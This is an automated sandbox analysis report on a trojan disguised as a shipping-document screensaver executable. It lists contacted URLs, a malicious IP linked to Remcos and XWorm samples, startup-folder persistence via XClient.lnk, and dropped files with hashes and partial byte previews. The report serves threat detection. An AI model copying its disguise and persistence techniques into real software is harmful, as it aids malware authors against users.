http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000004.00000002.2107616317.0000000004AE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2151007476.00000000050C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2186053072.0000000004836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2244028681.0000000005297000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/DataSet1.xsd	PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, XClient.exe.3.dr	false		unknown
https://contoso.com/	powershell.exe, 0000000C.00000002.2272001202.0000000006137000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.2116994219.00000000059F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2160747319.0000000005FD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2201275133.0000000005748000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2272001202.0000000006137000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 0000000C.00000002.2272001202.0000000006137000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000000C.00000002.2272001202.0000000006137000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microsofts	powershell.exe, 00000007.00000002.2167832641.0000000008922000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, 00000003.00000002.4525682109.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2107616317.0000000004991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2151007476.0000000004F71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2186053072.00000000046E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2244028681.00000000050D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000C.00000002.2244028681.0000000005226000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crl.mi	powershell.exe, 00000004.00000002.2122523697.00000000072D9000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.250.180.178	unknown	United States		9009	M247GB	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1542954
Start date and time:	2024-10-27 00:25:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe renamed because original name is a hash value
Original Sample Name:	PACKIING- - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@15/21@0/1
EGA Information:	Successful, ratio: 83.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 352 Number of non-executed functions: 58
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 3292 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Simulations

Behavior and APIs

Time	Type	Description
00:26:30	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
18:26:01	API Interceptor	8627805x Sleep call for process: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe modified
18:26:05	API Interceptor	45x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.250.180.178	rSOD219ISF-____.scr.exe	Get hash	malicious	Remcos	Browse
	rWWTLCLtoUSADCL.scr.exe	Get hash	malicious	XWorm	Browse
	ttCOg61bOg.exe	Get hash	malicious	Remcos	Browse
	SKM_C364e24092511300346565787689900142344656767788755634232343456768953334466870.scr.exe	Get hash	malicious	Remcos	Browse
	ISF #U8a02#U8259#U55ae - KHH-TOLEDO(VIA NYC) SO6615#U21928152 WKH2406122.scr.exe	Get hash	malicious	XWorm	Browse
	ISF 10+2 - SO - SO 4042 - ROTHENBERGER USA, INC#U51fa#U8ca8 TWSE0211390.scr.exe	Get hash	malicious	Remcos	Browse
	F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Get hash	malicious	XWorm	Browse
	DRAFT BL - CLS930 KHH-TOLEDO(VIA NYC) SO6615#U21928152 WKH2406122.scr.exe	Get hash	malicious	XWorm	Browse
	6122.scr.exe	Get hash	malicious	Remcos	Browse
	6122.scr.exe	Get hash	malicious	Remcos	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
M247GB	x86.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	arm5.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	nshmpsl.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	nsharm.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	nsharm5.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	harm5.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	harm4.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	mips.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	T52Z708x2p.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	91.202.233.141
	lJ4EzPSKMj.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	91.202.233.141

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.log

Download File

Process:	C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.38001807625381
Encrypted:	false
SSDEEP:	48:jWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//MvUyus:jLHyIFKL3IZ2KRH9Oug8s
MD5:	E6ECC713921FCEE12A12C17E11F929A0
SHA1:	50AFB72638C2502D932215F0B9E02FF327BD5EC0
SHA-256:	1CED45430B656420C3EFE9EAA9BC3AB5018F39B56CE79A9476B34F125E160444
SHA-512:	C87AAF6E62FCDDB5C4053D8FD2703E8F536B9C346AED10633C72A521773BEFD3E15E26AF0226A0366C2E566960710A3EA3383C96A78495719DB1692C9A3F4663
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	3.598349098128234
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsra:EFYJKDoWra
MD5:	2C11513C4FAB02AEDEE23EC05A2EB3CC
SHA1:	59177C177B2546FBD8EC7688BAD19D08D32640DE
SHA-256:	BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
SHA-512:	08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
Malicious:	false
Preview:	....### explorer ###..[WIN]r

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0e2khuxc.z2g.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zkopqrk.c1h.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1puojpvp.gjq.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fgbf1fg.5z3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cctkwvjs.ojt.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ddz1g5gd.dur.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eyo11ksp.ezi.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jzw3zstz.gsz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbwkwkaw.a0x.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lut3sdm0.lg4.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mgmdjcek.jdl.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opsvl4lt.0sw.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sebsye04.0bz.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_szgsbeet.0dn.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t21lvj1f.5ep.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvtspzon.1nh.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Download File

Process:	C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Oct 26 21:26:26 2024, mtime=Sat Oct 26 21:26:26 2024, atime=Sat Oct 26 21:26:26 2024, length=523776, window=hide
Category:	dropped
Size (bytes):	765
Entropy (8bit):	5.0630860047087936
Encrypted:	false
SSDEEP:	12:829R124f788CgSrlsY//7TjLt24jAQHkfjJ3mV:829Rpfw8SrZ/0cAfflm
MD5:	ED86FBEDE8568B1D0F56C7ADB1D1C281
SHA1:	7B9FE22880050D1A556CE6283F688E7BC0306886
SHA-256:	D481990E88C835D976B53F97723ED1C07896E9AD91DE378580FEDEB1EF6D6FD4
SHA-512:	AB5EF262355C68E77551024E1DBA1C54448F172329024F405F7E5FE96CE1BD6404E27C87259E8AFA5E58C9FFB3401ED24546A6CCF85A9F7765CBE483C507CF69
Malicious:	false
Preview:	L..................F.... ...~....'..~....'..~....'..........................v.:..DG..Yr?.D..U..k0.&...&...... M..........'...&...'......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlZY=.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....ZY;...Roaming.@......DWSlZY;.....C.....................J...R.o.a.m.i.n.g.....b.2.....ZYN. .XClient.exe.H......ZYN.ZYN...............................X.C.l.i.e.n.t...e.x.e.......Z...............-.......Y............9......C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......965543...........hT..CrF.f4... .]`.U....,...W..hT..CrF.f4... .]`.U....,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\XClient.exe

Download File

Process:	C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	523776
Entropy (8bit):	7.9012989047954045
Encrypted:	false
SSDEEP:	12288:HCfia2Q+RH4w8yqJ3ItYvk71CyBC7Lkf/:HYiHQ+R5jYc7p
MD5:	632F722953592E348C533977A5F251D7
SHA1:	D4E62B7060F00888D43EB1FBB0D0F8F5FBD8EF4D
SHA-256:	4978A378806FD5D68C08AD4602F80D3F5F1F870CB072475BD32B7A8CA32A3D88
SHA-512:	1B41503D38A2862E499EC5C21C7510CB8A95676EB5ECA546910DDDDF09A1C1AAF0216C572119F0C3FFC0F7A0A4516823CAE9F32B27BEA381C03D4C07DCAAEE56
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ... ....@.. .......................`............@.................................H...O.... ..0....................@......(...p............................................ ............... ..H............text........ ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B................\|.......H........t...i......M...................................................z..}.....(.......(......(.......0............{....o....r...p(......,...{....o....(.........0..]........( .....,R..{....o!....("...o#.....{.....{....o$....("...o%...o&.....{......X.o'......}.........0............(......,...((.........0..!.........(......,...{....o).....(......6.r...p(...&....{.....(......{....r...po+........0..U.........{....,..{.......+....,....(....}......}.....+$.{....,..{....+.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
